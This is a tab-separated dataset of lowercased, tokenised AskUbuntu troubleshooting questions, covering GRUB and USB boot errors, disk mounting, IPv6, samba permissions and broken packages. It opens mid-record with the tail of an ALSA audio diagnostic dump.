( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) position_fix : 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 power_save : 0 power_save_controller : y probe_mask : -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 probe_only : 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 single_cmd : n snoop : y ! ! hda-intel codec information ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- - -- startcollapse -- codec : intel ibexpeak hdmi address : 3 afg function id : 0x1 ( unsol 0 ) vendor id : 0x80862804 subsystem id : 0x104d4600 revision id : 0x100000 no modem function group found default pcm : rates [ 0x0 ] : bits [ 0x0 ] : formats [ 0x0 ] : default amp-in caps : n/a default amp-out caps : n/a gpio : io=0 , o=0 , i=0 , unsolicited=0 , wake=0 node 0x02 [ audio output ] wcaps 0x6611 : 8-channels digital converter : stream=8 , channel=0 digital : enabled genlevel digital category : 0x2 pcm : rates [ 0x7f0 ] : 32000 44100 48000 88200 96000 176400 192000 bits [ 0x1e ] : 16 20 24 32 formats [ 0x5 ] : pcm ac3 power states : d0 d3 power : setting=d0 , actual=d0 node 0x03 [ audio output ] wcaps 0x6611 : 8-channels digital converter : stream=0 , channel=0 digital : enabled digital category : 0x0 pcm : rates [ 0x7f0 ] : 32000 44100 48000 88200 96000 176400 192000 bits [ 0x1e ] : 16 20 24 32 formats [ 0x5 ] : pcm ac3 power states : d0 d3 power : setting=d0 , actual=d0 node 0x04 [ pin complex ] wcaps 0x40778d : 8-channels digital amp-out cp amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x80 ] pincap 0x09000094 : out detect hbr hdmi dp pin default 0x58560010 : [ n/a ] digital out at int hdmi conn = digital , color = unknown defassociation = 0x1 , sequence = 0x0 pin-ctls : 0x40 : out unsolicited : tag=00 , enabled=0 power states : d0 d3 power : setting=d0 , actual=d0 connection : 2 0x02* 0x03 node 0x05 [ pin complex ] wcaps 0x40778d : 8-channels digital amp-out cp amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x80 ] pincap 0x09000094 : out detect hbr hdmi dp pin default 0x58560020 : [ n/a ] digital out at int hdmi conn = digital , color = unknown defassociation = 0x2 , sequence = 0x0 pin-ctls : 0x40 : out unsolicited : tag=00 , enabled=0 power states : d0 d3 power : setting=d0 , actual=d0 connection : 2 0x02* 0x03 node 0x06 [ pin complex ] wcaps 0x40778d : 8-channels digital amp-out cp control : name= '' hdmi/dp , pcm=3 jack '' , index=0 , device=0 control : name= '' iec958 playback con mask '' , index=0 , device=0 control : name= '' iec958 playback pro mask '' , index=0 , device=0 control : name= '' iec958 playback default '' , index=0 , device=0 control : name= '' iec958 playback switch '' , index=0 , device=0 control : name= '' eld '' , index=0 , device=3 amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x00 ] pincap 0x09000094 : out detect hbr hdmi dp pin default 0x18560030 : [ jack ] digital out at int hdmi conn = digital , color = unknown defassociation = 0x3 , sequence = 0x0 pin-ctls : 0x40 : out unsolicited : tag=01 , enabled=1 power states : d0 d3 power : setting=d0 , actual=d0 connection : 2 0x02* 0x03 node 0x07 [ vendor defined widget ] wcaps 0xf00000 : mono -- endcollapse -- ! ! alsa device nodes ! ! -- -- -- -- -- -- -- -- - crw-rw -- -t 1 root audio 116 , 4 jul 7 00:31 /dev/snd/controlc0 crw-rw -- -t 1 root audio 116 , 3 jul 7 00:31 /dev/snd/hwc0d3 crw-rw -- -t 1 root audio 116 , 2 jul 7 00:34 /dev/snd/pcmc0d3p crw-rw -- -t 1 root audio 116 , 1 jul 7 00:31 /dev/snd/seq crw-rw -- -t 1 root audio 116 , 33 jul 7 00:31 /dev/snd/timer /dev/snd/by-path : total 0 drwxr-xr-x 2 root root 60 jul 7 00:31 . drwxr-xr-x 3 root root 160 jul 7 00:31 .. lrwxrwxrwx 1 root root 12 jul 7 00:31 pci-0000:00:1b.0 - > ../controlc0 ! ! aplay/arecord output ! ! -- -- -- -- -- -- -- -- -- -- aplay **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 arecord **** list of capture hardware devices **** ! ! amixer output ! ! -- -- -- -- -- -- - ! ! -- -- -- -mixer controls for card 0 [ intel ] card hw:0 'intel'/'hda intel at 0xf6000000 irq 44' mixer name : 'intel ibexpeak hdmi' components : 'hda:80862804,104d4600,00100000' controls : 7 simple ctrls : 2 simple mixer control 'pcm',0 capabilities : pvolume penum playback channels : front left - front right limits : playback 0 - 255 mono : front left : playback 255 [ 100 % ] [ 0.00db ] front right : playback 255 [ 100 % ] [ 0.00db ] simple mixer control 'iec958',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ on ] ! ! alsactl output ! ! -- -- -- -- -- -- -- -- startcollapse -- state.intel { control.1 { iface card name 'hdmi/dp , pcm=3 jack' value false comment { access read type boolean count 1 } } control.2 { iface mixer name 'iec958 playback con mask' value '0fff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access read type iec958 count 1 } } control.3 { iface mixer name 'iec958 playback pro mask' value '0f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access read type iec958 count 1 } } control.4 { iface mixer name 'iec958 playback default' value '0400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access 'read write' type iec958 count 1 } } control.5 { iface mixer name 'iec958 playback switch' value true comment { access 'read write' type boolean count 1 } } control.6 { iface pcm device 3 name eld value '' comment { access read type bytes count 0 } } control.7 { iface mixer name 'pcm playback volume' value.0 255 value.1 255 comment { access 'read write user' type integer count 2 range '0 - 255' tlv '0000000100000008ffffec1400000014' dbmin -5100 dbmax 0 dbvalue.0 0 dbvalue.1 0 } } } -- endcollapse -- ! ! all loaded modules ! ! -- -- -- -- -- -- -- -- -- module ppp_deflate zlib_deflate bsd_comp ppp_async crc_ccitt joydev snd_hda_codec_hdmi snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_seq_midi psmouse snd_rawmidi cdc_acm rfcomm arc4 bnep serio_raw parport_pc snd_seq_midi_event intel_ips ppdev i915 uvcvideo videodev snd_seq btusb bluetooth ath9k drm_kms_helper mac80211 binfmt_misc drm ath9k_common ath9k_hw ath snd_timer snd_seq_device cfg80211 i2c_algo_bit snd mei soundcore snd_page_alloc mac_hid sony_laptop video lp parport usb_storage sky2 sdhci_pci sdhci ! ! sysfs files ! ! -- -- -- -- -- - /sys/class/sound/hwc0d3/init_pin_configs : 0x04 0x58560010 0x05 0x58560020 0x06 0x18560030 /sys/class/sound/hwc0d3/driver_pin_configs : /sys/class/sound/hwc0d3/user_pin_configs : /sys/class/sound/hwc0d3/init_verbs : /sys/class/sound/hwc0d3/hints : ! ! alsa/hda dmesg ! ! -- -- -- -- -- -- -- [ 31.606871 ] intel ips 0000:00:1f.6 : ips driver initialized , mcp temp limit 90 [ 31.606971 ] snd_hda_intel 0000:00:1b.0 : pci int a - > gsi 22 ( level , low ) - > irq 22 [ 31.607163 ] snd_hda_intel 0000:00:1b.0 : irq 44 for msi/msi-x [ 31.607191 ] snd_hda_intel 0000:00:1b.0 : setting latency timer to 64 [ 31.643577 ] hdmi status : codec=3 pin=6 presence_detect=0 eld_valid=0 [ 31.643671 ] input : hda intel hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 [ 31.679687 ] rfkill : input handler disabled
492604	how to fix usb pendrive	i am running ubuntu 13.10 and my friend gave me a pendrive to repair . when i use gparted it does n't work , so i went to the information section and then it said this : warning unable to detect file system ! possible reasons are : the file system is damaged the file system is unknown to gparted there no file system available ( unformatted ) the device entry/dev/sdc1 is missing the pendrive is a kingston 32gb pendrive .
492605	how to restore the unity login screen after installing xubuntu desktop in ubuntu 14.04	i have just installed an xubuntu desktop on my ubuntu unity 14.04 system using this command : sudo apt-get install xubuntu-desktop gksu leafpad synaptic from this site : after logging out and logging into an `` xubuntu session '' and running this command : sudo apt-get remove nautilus gnome-power-manager gnome-screensaver gnome-termina* gnome-pane* gnome-applet* gnome-bluetooth gnome-desktop* gnome-sessio* gnome-user* gnome-shell-common compiz compiz* unity unity* hud zeitgeist zeitgeist* python-zeitgeist libzeitgeist* activity-log-manager-common gnome-control-center gnome-screenshot overlay-scrollba* & & sudo apt-get install xubuntu-community-wallpapers & & sudo apt-get autoremove and when restarting i come to a xubuntu login window , and when i click on the little xubuntu icon at the top righthand corner i can only run an `` xfce session '' or an `` xubuntu session '' . any help will be greatly appreciated .
492617	when installing grub to a windows 7 install usb i get this error	i followed everything correctly but when executing the last command i get this error grub-install : error : can not find efi directory . so far i have followed these steps format your usb drive as ntfs using gparted copy all files from windows iso to usb drive using your favorite file manager install grub on usb : sudo grub-install -- root-directory= '' /media/ '' /dev/sdx i ran the command like this sudo grub-install -- root-directory=/media/christian/45a1483d795f007f/dev/sdb note : the drive i am running is slowly failing . a file could be corrupted ! please do n't just assume this is the problem though . ugg i am totally stuck on this ! thanks update i was doing something wrong ! after /media/drive i put /dev/sdb without a space ! after putting a space i now get this error grub-install : error : /media/christian/windows 7/ does n't look like an efi partition .
492619	trusty ipv6 is disabled , but applications are still binding to ipv6 address ports	i have set sysctl to disable ipv6 : vagrant @ puppet : ~ $ cat /etc/sysctl.d/10-ipv6-disable.conf net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.disable_ipv6 = 1 net.ipv6.conf.lo.disable_ipv6 = 1 next i have rebooted and checked that ipv6 is disabled ( 1 = disabled ) : vagrant @ puppet : ~ $ cat /proc/sys/net/ipv6/conf/all/disable_ipv6 1 however , netstat shows that applications are still binding to ipv6 ports : vagrant @ puppet : ~ $ netstat -nalt active internet connections ( servers and established ) proto recv-q send-q local address foreign address state tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen ... tcp 0 0 192.168.56.5:3389 192.168.56.1:32744 established tcp6 0 0 : ::22 : : : * listen tcp6 0 0 : ::53378 : : : * listen tcp6 0 0 : ::111 : : : * listen any ideas ?
492621	xdotool could not move mouse inside firefox	i have been trying for many days to get xdotool to move and click inside firefox but i could n't . so please help me . my script was simple but it did n't work : # ! /bin/bash firefox www.google.com # opening firefox sleep 2 # wait 2 sec xdotool mousemove -- sync 1335 165 # moving the mouse to a coordinate sleep 2 # wait 2 sec xdotool click 1 # finally clicking in a button i would appreciate it if someone can help me .
492622	add harddisk to ubuntu and mount it to /var/www/	i have installed an ubuntu server on a vmware workstation with a space of 20gb storage as seen below : after the installation i 've attached another 40gb worth storage to the existing ubuntu server installation ( seen below ) : now i want to add this 40gb to my / ( root ) directory or to /var/ directory but my df -h result shows ; root @ userver : ~ # df -h filesystem size used avail use % mounted on /dev/sda1 18g 900m 16g 6 % / udev 990m 4.0k 990m 1 % /dev tmpfs 400m 308k 399m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 999m 0 999m 0 % /run/shm none 100m 0 100m 0 % /run/user root @ userver : ~ # what should i do now ? further , i have only ssh access to the server . some one told me to do : sudo mkfs.ext4 /dev/sdb -i and when i do this command : root @ userver : ~ # ls /dev/sd* /dev/sda /dev/sda1 /dev/sda2 /dev/sda5 if you look carefully you , you do n't see '' sdb '' or `` sdb1 '' next , i 'm restart ubuntu-server and after restart there was a `` sdb '' on `` /dev/ '' like this : root @ userver : ~ # ls /dev/sd* /dev/sda /dev/sda1 /dev/sda2 /dev/sda5 /dev/sdb now when i do this command : root @ userver : ~ # mkfs.ext4 /dev/sdb -i mkfs.ext4 : option requires an argument -- 'i' usage : mkfs.ext4 [ -c|-l filename ] [ -b block-size ] [ -c cluster-size ] [ -i bytes-per-inode ] [ -i inode-size ] [ -j journal-options ] [ -g flex-group-size ] [ -n number-of-inodes ] [ -m reserved-blocks-percentage ] [ -o creator-os ] [ -g blocks-per-group ] [ -l volume-label ] [ -m last-mounted-directory ] [ -o feature [ , ... ] ] [ -r fs-revision ] [ -e extended-option [ , ... ] ] [ -t fs-type ] [ -t usage-type ] [ -u uuid ] [ -jnqvdfksv ] device [ blocks-count ] , , , , , , , , , please help me , i want to add the 40g hard to ubuntu 12.04 , and mount it to `` /var/www/ '' but i cant do that i use some how to 's and i get this error 's : root @ userver : ~ # mount /dev/sdb1 /var/www/ mount : mount point /var/www/ does not exist i dont know what should i do
492623	`` not authorized to perform operation '' when trying to open disc	i use ubuntu in liveusb and i want to open the hard-disc of the computer or usb flash drive but ti gives me this error message : not authorized to perform operation this happen now but not before and not in my windows . i need it to ask another question ...
492625	how can i hang the installing ?	my problem is : the internet is discontinuous and this make a lot of problems while installing any thing ; packages , updates and upgrades.i want to know any way or any application that can hang the installing until the internet will be back again .
492631	videos from youtube ( only ) are not streaming in any browser in ubuntu gnome 14.04 lts x64	i have tried using firefox , chromium , chrome , epiphany , but nothing seem to work . few days back , youtube was working like a charm and suddenly it stopped working . i had ubuntu-restricted-extras installed in my system . i have tried uninstalling previous flash package and installing other flash packages like adobe-flashplugin , flashplugin-installer , libflashplayer.so ( which came in some package from adobe.com ) , gnash ( one at a time ) . gnash is even unable to stream the videos from youtube . although , flash seem to be installed correctly ( confirmed by about : plugins in firefox ) . do not suggest me to purge remove flash again as i did it like 10 times . in case my system 's configuration is relevant , here it is : running in : vmware workstation 10 cpu : amd a8-4500m ( given 2 cores ) gpu : amd 7640g+7670m ram : 4 gb ( given 2 gb ) ( ps : i experience a lot of problems in linux for having amd machine )
492633	winusb install error	while trying to install windows 7 to a usb stick i get this error during ( or after ) the syncing stage of winusb i ca n't post an image so here is a link http : //imgur.com/dnquuee it looks like the grub-install command failed to run , this also happened when trying to manually install grub when installing grub to a windows 7 install usb i get this error thanks !
492634	usb bootable for ubuntu 14.04 lts	i have sony usb and i tried with it but does n't take boot or welcome screen of ubuntu pc normally started .
492638	lubuntu 14.04 lts 64bit dell vostro 1520	when trying to install ubuntu 14.04 lts 64bit version , the system hangs with lubuntu logo on screen and 5 dots moving left to right beneath . i reproduced this several times with two different downloads on two different cds .
492640	mouse does n't work in installation but does in livecd	i did a clean install of lubuntu 14.04 64-bit on my laptop . after the install the mouse stopped working . when i boot into the livecd the mouse works as it should . i am using a usb mouse as the touchpad mouse is shot . the mouse was working before . i had lubuntu 32-bit installed and later realized that the computer was a 64-bit so i did a clean install of the 64-bit version . i 've tried updating packages just in case but i do n't see how that would affect the mouse operation . especially since the mouse works in the livecd .
492641	data recovery from partition , that ubu formatted during install	my ubuntu system broke up few weeks ago and there was not another way than reinstall . as i do not have anything that big as my data values on hdd , i parted the disk to two similarly sized partitions . one sda ( x ) and one with a label yy , where was my backup . when i booted up live usb partitions could be seen . i began with installation and chose to install ubuntu instead of xx system there was before . i had no idea , that ubu would reformat whole hdd to install itself . and so as it was my work computer and i am a ceo at the company , there were too many valuable data that i can not afford to lose . is there a way to recover at least something ? what do i need to do so ? thank you very much
492642	add two eclipse icons in launcher	i have 2 versions of eclipse downloaded on my 64 bit ubuntu 14.04 . i use both for different purposes , so they have different plugins etc . how do i lock both to the launcher ( the vertical bar on the left side of the screen with icons ) ? i have locked one , but when i open the other eclipse from nautilus , it gets associated with the same launcher icon . so i can not lock this second eclipse to the launcher . why ca n't the launcher recognize that they are two different applications ? is there a workaround for this ? i just want to be able to open both versions of eclipse using different icons in the launcher .
492644	ubuntu 14.04 32bit.iso will not load , at all , from kingston usb	my computer does n't seem to be capable of using this on a usb stick . am i missing something here ? i 've followed all instructions i can find for using a usb drive but my computer will not load the .iso file at all . am i supposed to convert it or what ?
492648	how to create a vpn server	i need to be able to connect my windows users to my ubuntu server through a vpn via internet so that they can brows the shared folder once connected to the server . i basically have 2 nic 's already installed . here is my etc/network/interface configuration fyi . i have 2 virtual servers running on ubuntu and have a 2nd hdd sharing my files . auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet manual auto br0 iface br0 inet static address 192.168.2.100 netmask 255.255.255.0 network 192.168.2.0 broadcast 192.168.2.255 gateway 192.168.2.1 dns-nameservers 208.67.222.222 208.67.220.220 dns-search google.com bridge_ports eth0 bridge_stp off bridge_fd 0 bridge_hello 2 bridge_maxwait 0 post-up ip link set br0 address 00:10:18:77:5e:46 # secondary network interface # auto eth1 # iface eth1 inet static # address 192.168.2.150 # netmask 255.255.255.0 # network 192.168.2.0 # broadcast 192.168.2.255 # gateway 192.168.2.1 # dns-nameserver 192.168.2.1 8.8.8.8 any help is much appreciated . please also note that i am not an expert rather a newbee .
492650	c compiler can not create executables	everything was right . i have installed gdb from github and installed in /usr/local/bin . after that i removed default gdb ( /usr/bin ) using the following command sudo apt-get remove gdb now , when try to configure i am getting following errors : checking whether the c compiler works ... no configure : error : c compiler can not create executables see `config.log ' for more details it 's look like c compiler issue . but i have gcc , g++ and build-essential installed . even i did configure and make before the gdb ( github ) installation . my system is ubuntu 14.04 ( 64bit ) . i also found that by including 'o3 ' in cflags it can be solved . but it 's not working for me . please help . edit when i try to compile a simple c file using gcc ( gcc test.c ) i got this error : /usr/local/bin/ld : this linker was not configured to use sysroots i also tried to re-install binutils . but it did n't help .
492653	problems with install 14.04	i 'm trying to install ubuntu 14.04 on my computer beside win8 . i have started install it by this guide . when i start the installation i got this message : this computer currently has no detected operation systems . what would you like to do ? *erase disk and install ubuntu *somthing else because i have win8 installed in my computer , i have chosen `` somthing else '' . than i got this screen : if there is problems with the image try this link . the first 4 lines is the hard disk ( first line-general,2nd-win* , 3th-none,4th-i want to install here ) . the last 2 lines is another usb stick . i tried choosing in the table and in the choose-box the partition i need and it gaves me this error mesage : no root file system is defined . please correct this from the partitioning menu . what do i need to do ? edit : now i see that i destroyed my win8 with tose games edit2 : i do n't know what did i do but when i 'm tring to re-install win8 i see that i did n't format the disk and the files is there ( i see that the drive have in-use space ) but windows dos n't works and the comuter says that it is n't proper boot device . what the hell is going here ?
492654	create a random decimal number in bash	i am programming in bash . i return a function f , lets say f=logn . i now want to add an error up to 5 percent to that function . therefore now i use : my_log= $ ( echo `` l ( $ i ) '' | bc -l ) echo $ my_log |bc however i want to return my_log= $ ( echo `` l ( $ i ) '' | bc -l ) error = ( a random number from 0 to 0.05 ) * $ my_log echo $ my_log+ $ error |bc how do i calculate that random number from 0 to 0.05 ?
492656	ubuntu 14.04 with parallels on mac	last week iâ´ve tried to install ubuntu 14.04 with parallels as a vm it works well but i didnt could install the parallels tool . for test i have tried 12.04 too and the parallels tools are working perfectly . someone have experience with that ? would be nice to have some information how i can install the tools on 14.04 . greetings
492657	how do i boot into a uefi usb drive ?	this is odd ... i am currently trying to install windows 7 onto a usb install disk but nothing seems to work so far i have tried unetbooten winusb ( grub install failed : does not look like efi device ) manual ( grub install failed : does not look like efi device ) i think i need to boot into the drive without using grub . but how ? ? ? every install method i have come across on the net uses grub ! i have copied the .iso to the drive and set it 's flag to boot in gparted now what ? ? ?
492659	problem upgrading from kubuntu 12.04.4 to 14.04	good morning , i have kubuntu 12.04.4 lts and would like to upgrade to 14.04 lts . i tried to follow the instructions at https : //help.ubuntu.com/community/trustyupgrades/kubuntu/12.04lts but after updating my system as described my system can not find any upgrades . i am running the 3.2.0-65-generic kernel . how can i upgrade to 14.04 ? thank you so much .
492660	sort by image resolution ( dimensions )	which program have a function to sort images by thier pixel size / resolution / dimensions . very strange but even so powerfull digikam does n't have so simple function . any suggestions ?
492663	i can not print from okular , however printing from other programs works fine	i have ubuntu 14.04 and xerox phaser 3250 . when i try to print from okular , it does not react in any form , however if i print from kile , evince , libreoffice etc , everything is fine . i hav no any idea , where to look for an answer .
492664	hp xw4200 fan speed	i just installed ubuntu 14.04 on my old hp xw4200 workstation ( p4 3.4 ghz , 3 gb of ram , ati firegl 5200 ) . the install worked without any issue and the system seems responsive . the problem is that the cpu fan is spinning at maximum speed ( and it 's very loud ) . i supose some kind of power management is not working . any idea about how to make it quiet ? regards pit
492667	low-res display and no networking in installation and liveusb after thermal hard shutdown	my asus laptop running 14.04 shut down hard and spontaneously while i was using it one day . since it was very hot ( forgot the heatsink that day ) , and since windows used to shut down due to over-heating on the same laptop ; i assumed it was a thermal shutdown , no worries . on booting again , my laptop monitor could only be displayed at a low 4:3 resolution . also , networking was disabled ; to be precise , it said ethernet was disabled and did n't even show the wifi section . booting from different kernels , or in recovery mode did n't change anything . but most boggling of all : a 14.04 liveusb i displayed the same symptoms , despite having no apparent connection to the installed system . that does n't make any freakin ' sense* ; but i ca n't have damaged the system permanently either , as a commenter suggest , as windows 8 still works fine . dmesg did n't turn up anything relevant . ask if more info is required . * i tried again the next day , and the liveusb does n't display the same symptoms ( although it did shut down spontaneously twice ) . i 'm guessing that i did n't actually boot into it . update : i tried reinstalling ubuntu from the liveusb selecting the `` keep my personal data option '' ; but on rebooting , the system still displayed the same problems . selecting the `` erase ubuntu and reinstall '' option finally got me a normal system .
492668	update error in ubuntu 14.04	when i 'm running sudo apt-get update i am getting following errors/exceptions . give me some solutions.. w : failed to fetch http : //mirror.kavalinux.com/ubuntu/dists/trusty/multiverse/source/sources 404 not found w : failed to fetch http : //mirror.kavalinux.com/ubuntu/dists/trusty-updates/main/source/sources 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem .
492674	custom share permission to users in a samba file server	i have a shared folder in samba in ubuntu 12.04 lts desktop , want to assign read only permission to 20 users and read-write permission to a single user , how do i do it ?
492675	how do i use numix window decorations with kwin on a non-kde desktop	i 'm running kwin as a window-manager in xubuntu . i also installed some qtcurve stuff . i 'd like to use the numix window decorations . i 've installed the numix gtk and kde theme from ppa but i do n't see the numix windows decorations in the `` more actions '' - > `` window manager settings ... ''
492678	adobe shockwave flash player shows error screen on youtube player ( firefox )	adobe shockwave flash player 11.2.202.378 on firefox shows an error screen on youtube player like this and not able to play anything no matter what . had the same problem with chromium and fixed it with the solution explained here . any help ? ? thanks in advance . then came the update from ubuntu . now flash works with some minor bugs
492679	how to get mtp device name	... i 've tried search but it gives a tons of `` how to connect mtp devices '' i just want to know how to get connected device name like ( nexus 10 or galaxy s5 ) , that i can see in nautilus device list .
492680	how do i merge 2 vmware disks in to a single one ?	i have installed an ubuntu server on a vmware workstation with a space of 20gb storage as seen below : after the installation i 've attached another 40gb worth storage to the existing ubuntu server installation ( seen below ) : now i want to add this 40gb to my / ( root ) directory it mean 's i want that my / directory became to 60g , like it will be resize from 20g to 60g ( 20g + 40g ) , i do n't know what should i do , can any body help me ? , my df -h result shows ; root @ userver : ~ # df -h filesystem size used avail use % mounted on /dev/sda1 18g 900m 16g 6 % / udev 990m 4.0k 990m 1 % /dev tmpfs 400m 308k 399m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 999m 0 999m 0 % /run/shm none 100m 0 100m 0 % /run/user root @ userver : ~ # it must be 60g ! i have no graphic mode , then i ca n't use gparted tools , i 'm just have ssh access !
492685	web server for a static site on ubuntu minimal server 14.04 . what to choose ?	i have a vps working on a ubuntu 14.04 minimal server and i need to install a web server for a static web-site on this vps , no database , no scripts background and minimal traffic . as far a i can see there are few different web server implementations . what are the differences between them and how do i decide which is best for me . my site is totally static .
492688	idle and pycharm using python 3.4.0 when 3.4.1 installed ?	i recently visited the python site , and noticed that a new version , 3.4.1 had come out . my ubuntu 14.04 had 3.4.0 , so i downloaded 3.4.1 and installed it . when i open idle , it showed 3.4.0 , but when i open a terminal and type python3 , it shows 3.4.1 . i re-installed idle , then i searched for idle 3.4.1 ubuntu , but i did not get anything . i got debian 's packages site for the idle 3.4.1.deb file , so i downloaded that . i installed it , and yet idle showed 3.4.0 , when i checked the ubuntu software center , and it showed idle-python3.4 3.4.1-6 version so it should work . update : looks like typing python34 and python340 just returns errors . but typing python3 gives me python 3.4.1 and of course python gives me python 2.7 . it is like python 3.4.0 is not there but idle is still able to somehow access to it in pycharm there is an option to choose which python interpreter you want to use , i get 2.7 and 3.4.0 there .
492689	mount error special device /dev/sda1 does not exist	this is related to my thread askubuntu forumlink right now i am stuck in recovering the data part . i just rebooted through a live usb of 13.04 ( my original os was 12.04lts ) . but ca n't seem to be able to /dev/sda1 where all my data was . it 's showing in gparted as well as sudo fdisk -l. sudo fdisk -l output : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00052866 device boot start end blocks id system /dev/sda1 2048 909690879 454844416 83 linux /dev/sda2 909692926 976766975 33537025 5 extended /dev/sda5 909692928 976766975 33537024 82 linux swap / solaris but when i try to mount it using `` sudo mount /dev/sda1 /mnt/ '' it throws me an error '' mount : special device /dev/sda1 does not exist '' , and when i try this `` sudo mount /dev/sda /mnt/ '' it throws me an error mount : unknown filesystem type 'isw_raid_member' any clue how to solve this thing . i really need to get my data back from that drive .
492694	eclipse dos n't see jdk	i had installed eclipse and it was working well few days ago . now i ca n't create java project , there is no such option and in the eclipse preferences there is no mention about the word java . i was re-installing several times from software center and the result was same . what should i do ? i am running ubuntu gnome 14.04 lts . can this happen because of system updates ?
492695	partitioning a lvm2_member partition	i 've installed the ubuntu 14.04 server and used the option `` guided use the entire disk and configure lvm '' to format my disk , when prompted about size of partition i 've set 60gb , but now when i take a look at lsblk i see that all the harddisk is already partitioned to sda5 and 60 gb to system / . name fstype size mountpoint label sda 465.8g ├─sda1 ext2 243m /boot ├─sda2 1k └─sda5 lvm2_member 465.5g ├─pitcairn -- vg-root ( dm-0 ) ext4 47.9g / └─pitcairn -- vg-swap_1 ( dm-1 ) swap 8g [ swap ] sdb 465.8g sdc 931.5g sdd 465.8g is there the possibility to use the `` unpartitioned ? '' space of sda5 to make another partition ? ?
492696	can not login to my account after recovering my password , ubuntu 13.10	i forgot my password to my admin account , so i tried to recover it many times , change it etc ... i tried it through grub , no luck . finally i succeeded through tty . so now i have a working passwd , hovewer still ! ! can not login into my account- there is a blank page , then it goes back to the login screen . an i can open only the guest account . the last thing i tried was ctrl alt f1 : after the login it wrote : no directory , logging in with home=- i srill tried these commands ls -shla | grep `` xauthority '' sudo mv .xauthority xauthority.old and i got this mv : can not stat 'xauthority '' : no such file or directory please write me step by step what shud i do , im not very good with linux.. thank you
492698	broken packages and unmet dependencies installing htk	i 'm trying to install htk 3.4.1 on ubuntu 12.04 , 64-bit machine . the ./configure command executes without any errors , but when i try to build using the make all command , it shows the following error : pradnya @ pradnya-desktop : ~/desktop/htk $ make all ( cd htklib & & make htklib.a ) \ || case `` '' in *k* ) fail=yes ; ; * ) exit 1 ; ; esac ; make [ 1 ] : entering directory `/home/pradnya/desktop/htk/htklib' gcc -m32 -ansi -d_svid_source -doss_audio -d'arch= '' x86_64 '' ' -wall -wno-switch -g -o2 -i . -dphnalg -c -o hgraf.o hgraf.c in file included from /usr/include/stdio.h:28:0 , from hshell.h:40 , from hgraf.c:54 : /usr/include/features.h:324:26 : fatal error : bits/predefs.h : no such file or directory compilation terminated . make [ 1 ] : *** [ hgraf.o ] error 1 make [ 1 ] : leaving directory `/home/pradnya/desktop/htk/htklib' make : *** [ htklib/htklib.a ] error 1 also , as a fix most forums said to execute : sudo apt-get -f install libc6-dev-i386 sudo apt-get -f install gcc-multilib but it fails and displays the following errors , correspondingly : pradnya @ pradnya-desktop : ~ $ sudo apt-get -f install libc6-dev-i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libc6-dev-i386 : depends : libc6-i386 ( = 2.15-0ubuntu10 ) but it is not going to be installed depends : libc6-dev ( = 2.15-0ubuntu10 ) but 2.15-0ubuntu10.3 is to be installed recommends : gcc-multilib but it is not going to be installed e : unable to correct problems , you have held broken packages . pradnya @ pradnya-desktop : ~ $ sudo apt-get -f install gcc-multilib reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gcc-multilib : depends : gcc-4.6-multilib ( > = 4.6.3-1~ ) but it is not going to be installed e : unable to correct problems , you have held broken packages . please help ! edit : here is the output of cat /etc/apt/sources.list : pradnya @ pradnya-desktop : ~ $ cat /etc/apt/sources.list deb http : //archive.ubuntu.com/ubuntu precise universe main restricted multiverse deb-src http : //archive.ubuntu.com/ubuntu precise universe main restricted multiverse # added by software-properties and cat /etc/apt/sources.list.d/* : pradnya @ pradnya-desktop : ~ $ cat /etc/apt/sources.list.d/* cat : /etc/apt/sources.list.d/* : no such file or directory
